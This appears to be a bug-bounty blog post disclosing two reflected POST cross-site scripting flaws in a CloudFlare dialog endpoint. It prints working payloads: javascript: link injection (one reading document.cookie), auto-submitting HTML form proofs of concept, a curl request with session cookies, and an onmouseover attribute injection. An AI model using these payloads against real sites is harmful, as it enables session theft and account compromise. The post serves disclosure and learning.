XSS in CloudFlare

#1 XSS

These are some of my duplicate vulnerabilities found. I just thought of sharing with you. Recently I found two POST XSS in CloudFlare and unfortunately I was not the first to report.
I found the first issue in the “Confirm Key Generator” dialog box.

Let’s have a closer look at the URL.


It seems like an XMLHttpRequest object is used in the server side it accept our POST request.

After playing around with “content=” parameter what I’ve noticed was that it filters all HTML tags except

<b></b> <p></p><A HREF=””> 

Well as <A HREF> tag is not filtered we can easily execute JavaScript.

<A HREF=”javascript:alert(document.cookie);”>XSS</A>

So the proof of concept would be:

  <!-- POC by Osanda -->
    <form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
      <input type="hidden" name="type" value="default" />
      <input type="hidden" name="content" value="Go to this link &lt;A HREF=&quot;javascript:prompt(&apos;XSS by Osanda&apos;);&quot;&gt;XSS&lt;/A&gt;" />
      <script>document.exploit.submit(); </script>

We don’t need an authorized account to trigger XSS since the issue is in “model-dialog.htm”. Here is the Curl command

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://www.cloudflare.com/my-account' \
    -b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
    --data-binary $'type=default&content=Go to this link <A HREF=\"javascript:prompt(\'XSS by Osanda\');\">XSS</A>' \

That is it Game Over 🙂

#2 XSS

The second XSS issue was in the “zoneupload” parameter in the “model-dialog.html” file. In the previous scenario all the HTML tags are truncated but in here instead they are converted into special chars. How to bypass this one? 😉

Well as usual “'() are not filtered 🙂

ABC" onmouseover="prompt('XSS by Osanda') ""

Here is the proof of concept:

    <form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
      <input type="hidden" name="type" value="zoneupload" />
      <input type="hidden" name="z" value="google.lk" />
      <input type="hidden" name="target" value="ABC&quot; onmouseover=&quot;prompt(&apos;XSS by Osanda&apos;) &quot;&quot;" />
      <input type="submit" value="Submit request" />

So yeah here we go XSS again 😀

Bug hunting is not all about getting your name in hall of fames or receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new 🙂


9 thoughts on “XSS in CloudFlare

  1. Thanks for your marvelous posting! I actually enjoyed reading it, you
    could be a great author.I will be sure to
    bookmark your blog and will come back in the foreseeable future.
    I want to encourage continue your great posts, have a nice morning!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s